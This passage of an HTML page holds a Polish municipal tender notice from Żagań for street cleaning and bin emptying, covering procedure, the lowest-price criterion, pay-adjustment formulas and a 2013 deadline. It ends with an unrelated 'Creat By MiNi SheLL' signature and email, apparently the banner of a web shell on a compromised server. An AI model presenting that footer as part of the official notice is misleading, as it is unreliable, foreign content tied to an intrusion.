    podmiotów  Wykonawca jest  zobowiązany dodatkowo  przedstawić : 
    a) pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji 
       niezbędnych   zasobów na okres korzystania z nich przy wykonywaniu 
       zamówienia oraz dokumentów  dotyczących:  zakresu dostępnych Wykonawcy 
       zasobów innego podmiotu. 
4. Stosowne pełnomocnictwo- w sytuacji określonej  w Specyfikacji Istotnych 
    Warunków Zamówienia
5. Potwierdzenie wniesienia wadium.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający - na podstawie art.144 ust.1 i 2 Ustawy Prawo zamówień publicznych dopuszcza możliwość  zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy.
a) w zakresie  wartości wynagrodzenia: 
    - w przypadku zmiany powierzchni objętej oczyszczaniem (powyżej 10%)
    wartość wynagrodzenia określonego w paragrafie 5 ust.1 litera a umowy  będzie 
    podlegała zmianie. 
    Nowa wartość wynagrodzenia ustalona będzie na podstawie następującego 
    wzoru: 
                  W n x Nx 
      Wx= --------------------------
                        N 
          
    gdzie : W x-  to nowa wartość wynagrodzenia 
                  Wn -  to wynagrodzenie wg  umowy
                  Nx - to nowa powierzchnia oczyszczania 
                  N -  to powierzchnia oczyszczana wg umowy

    - w przypadku zmiany ilości koszy (zwiększenia lub zmniejszenia) powyżej lub 
   poniżej 10 sztuk wartość wynagrodzenia określonego w paragrafie 5 ust.1 litera b 
   będzie  podlegała zmianie. Nowa wartość wynagrodzenia ustalana będzie na 
   podstawie następującego wzoru:
  
                  WN  x  NX
       WX=  -------------------   ;
                   N

       gdzie :  WX- nowa wartość  wynagrodzenia 
       N -  ilość koszy  wg umowy
                  WN- wartość umowna opróżniania koszy i wywozu śmieci w danym
                  miesiącu    
                   NX- nowa ilość koszy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zagan.pl zakładka przetargi publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Można ją otrzymać -na pisemny wniosek Wykonawcy w  siedzibie Zamawiającego : Urząd Miasta Żagań, 68-100 Żagań, Plac Słowiański 17,  Biuro Kontroli i Zamówień Publicznych -pokój nr 26..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.03.2013 godzina 11:00, miejsce: Urząd Miasta Żagań, 68-100 Żagań, Plac Słowiański 17,  Biuro Kontroli i Zamówień Publicznych -pokój nr 26..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com